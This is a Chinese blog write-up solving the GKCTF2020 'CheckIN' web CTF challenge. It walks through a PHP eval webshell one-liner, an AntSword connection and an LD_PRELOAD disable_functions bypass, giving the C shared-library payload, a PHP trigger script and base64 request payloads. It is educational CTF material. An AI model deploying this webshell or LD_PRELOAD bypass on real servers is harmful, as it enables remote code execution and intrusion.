CheckIN

最新推荐文章于 2023-08-21 20:47:58 发布
最新推荐文章于 2023-08-21 20:47:58 发布
阅读量467 收藏 2
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43774856/article/details/110406233
版权

CheckIN

打开链接,得到源码
在这里插入图片描述

<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

尝试用phpinfo();
/?Ginkgo=cGhwaW5mbygpOw==
发现禁用了很多函数
在这里插入图片描述
传入一句话木马,用蚁剑连接
eval($_POST[123]); ZXZhbCgkX1BPU1RbMTIzXSk7
在这里插入图片描述
发现flag,但是无法读取

这里需要绕过disable_funation函数,我们使用LD_PRELOAD绕过。LD_PRELOAD是一个linux系统的环境变量,由这个变量指定的so文件会在程序本身的so文件加载之前被加载。所以我们需要构造一个so文件和一个需要加载so文件的php程序,并且需要将LD_PRELOAD指定成我们构造的so文件。
步骤:
通过C语言,写一个恶意动态链接库文件hack.so→设置环境变量恶意的hack.so文件的路径→配合php中函数触发hack.so文件→RCE

1.c

#include<stdlib.h>
#include<stdio.h>
#include<string.h>
__attribute__((constructor))void payload() {
         unsetenv("LD_PRELOAD");
         system("/readflag > /var/tmp/flag.txt");
}

shell.php

<?php
putenv("LD_PRELOAD=/var/tmp/hack.so");
mail("", "", "", "");
error_log("",1,"","");
?>

访问php程序,无法直接访问到/var/tmp文件夹下面的php程序,我们通过include将php包含进来。

/?Ginkgo=aW5jbHVkZSgiL3Zhci90bXAvc2hlbGwucGhwIik7

最后得到flag
在这里插入图片描述

https://www.cnblogs.com/karsa/p/13051079.html

第二周任务[GKCTF2020]
Lumos427的博客
03-26 688
[GKCTF2020]cve版签到 刚看是啥也不会,去百度了一下这题,发现这是一个ssrf漏洞(服务端请求伪造) 下面是在网上找到的介绍 漏洞详情 PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
开发人员日常工作之一 - Check In代码
码农哈里
09-08 4070
Check in代码是开发人员每天必做的工作。如果当天的代码没有check in,那么别人将无法及时获得你的代码,更不用说继续其他的过程了。所以,请每位开发人员务必每天都要把自己的代码check in.
每日练习-[GKCTF 2020]CheckIN
m0_68113265的博客
08-21 228
本题前面有eval还增加eval原因是eval是把内容当作php代码执行写入$_POST[1]就不是一句话木马了,所以再增加一个eval(disable_function刚好没禁用)$_REQUEST是可以接受$_GET,$_POST,$_Cookie的,disable_function禁用了大多函数,可以使用蚁剑插件进行绕过。php配置文件默认的处理优先级,默认的数据写入顺序是EGPCS。当同时一个参数名,越往后的可以覆盖前面的参数。C代表$_COOKIE。S代表$_SERVER。
[GKCTF2020]CheckIN bypass_php7_disable_functions
偷一个月亮
09-01 501
[GKCTF2020]CheckIN <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = ...
[GKCTF2020]web
臭nana的博客
05-26 1166
CheckIN 打开题目得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$t
git-code-checkin:用于自动化 Git 代码签入电子邮件的 Python 脚本
07-02
git-code-checkin git-code-checkin 是一个 Python 脚本,用于自动化 Git 代码签入电子邮件。 目前,它仅适用于 Linux 上的 Python 3。 很快,它将跨平台并支持 Python 2。 作者: Ashish Kayastha 依赖关系 ...
阿里云盘自动签到程序_aliyundrive-checkin.zip
09-05
文件名称“aliyundrive-checkin-main”可以看出,该程序可能是一个主要的入口模块或核心文件,用户可能通过它来启动整个自动签到流程。而“aliyundrive-checkin.zip”则意味着开发者将整个程序及其所有依赖打包成...
基于Java、Vue、JavaScript、Shell、HTML的zzyl-CheckIn项目自动化部署设计源码
最新发布
02-25
zzyl-CheckIn项目是一个包含了770个文件的综合性系统,它通过精心设计的文件结构以及合理的编程语言选择,实现了中州养老后台管理系统中的入住办理自动化。项目中Java源文件的数量最多,占据了394个,这反映出后端...
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
The Chemkin thermodynamic data base.rar_CHEMKIN热力学数据_chemkin_the
07-14
chenkin软件所使用的热力学数据,可用来查询多种物质热力学数据。
Chemkin 各种反应机理汇总.rar
11-17
chemkin 常见的燃烧反应机理机理只是从各网站上汇总分享的数据,可以借鉴和参考,机理只是一部分,不是所有,分享给大家,供大家学习和参考。常见机理GRI_mech3.0,CO+H2,甲烷等,有机理和文档。
chemkin文件
01-07
chemkin文件
hackny-checkin:基于my.mlh.io的Android hackathon签到应用示例
05-17
hackNY Checkin 基于的Android hackathon应用示例
CHEMKIN III 学习笔记
热门推荐
qq_40583925的博客
10-10 1万+
首先简单说明一下,CHEMKIN由美国Sandia国家实验室开发,CHEMKIN II即以下版本为开源版本,CHEMKIN III开始科研使用需要购买版权,或使用旧版本实现相同功能。CHEMKIN III之后的版本开始带有简单的图形界面。这个软件包是一个比较经典的数值燃烧的代码包,主要提供和化学反应相关的翻译器,利用Arrhenius公式计算反应速率的计算器,以及一些经典的算例。 此处说几句题外话...
GKCTF web-CheckIN 解题思路writeup
qq_41743240的博客
05-24 1131
打开题目可以看到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin
[GKCTF2020]CheckIN
末初 · mochu7
06-17 1211
题目复现地址 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo'];
命令执行绕过的练习(一)
qwzf
08-12 1843
0x00 前言 总结完命令执行漏洞的相关绕过知识,做一下CTF题巩固一下,并总结一下做题过程。 0x01 GKCTF-Check_In 题目源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct()
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 396
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值